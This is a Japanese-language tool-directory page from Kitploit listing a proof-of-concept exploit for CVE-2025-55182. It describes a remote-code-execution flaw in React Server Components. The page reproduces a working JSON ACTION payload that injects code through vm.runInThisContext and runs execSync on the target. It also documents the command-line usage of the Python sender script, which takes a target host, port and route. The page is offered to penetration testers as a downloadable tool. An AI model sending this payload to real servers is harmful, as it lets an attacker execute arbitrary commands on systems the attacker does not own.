Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182POC — CVE-2025-55182 の概念実証エクスプロイト。悪意のある ACTION ペイロードと vm.runInThisContext インジェクションを介した React Server Components でのリモートコード実行を実証します。 | Kitploit
ツール/GitHubGitHub/sudo-yangziran/cve-2025-55182poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubsudo-yangziran/cve-2025-55182poc

CVE-2025-55182POC

CVE-2025-55182 の概念実証エクスプロイト。悪意のある ACTION ペイロードと vm.runInThisContext インジェクションを介した React Server Components でのリモートコード実行を実証します。

リポジトリを見る
229ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 React Server Components RCE POC

本プロジェクトは CVE-2025-55182 - React Server Components (RSC) RCE Proof of Concept であり、特定の条件下で vm.runInThisContext と 悪意のある ACTION payload を介してリモートコード実行をトリガーできることを示しています。

  • Python 側:悪意のある ACTION payload を自動送信し、レスポンスを解析

⚠ 脆弱性の概要(CVE-2025-55182)

React Server Components の ACTION payload は、特定の条件下で以下を行います:

  • JS オブジェクトにデシリアライズされる
  • vm.runInThisContext に渡されて実行される
  • server actions に自動的に注入される

攻撃者は以下の payload を構築できます:

root@kitploit:~
{
  "$ACTION_REF_0": "",
  "$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
パラメータ必須デフォルト値説明
--hostはいなしターゲットサーバーの IP またはドメイン。例:127.0.0.1、192.168.1.10、example.com
--portいいえ80ターゲット HTTP サービスのポート。例:3003
--pathはいなし脆弱性をトリガーできるルートパス。例:/feedback、/action
--httpsいいえFalseHTTPS を使用して payload を送信するか(デフォルトは HTTP)

python a.py --host <ターゲットIP> --port <ポート> --path <ターゲットURLパス>

python a.py --host 127.0.0.1 --port 3003 --path /feedback

ツールをダウンロード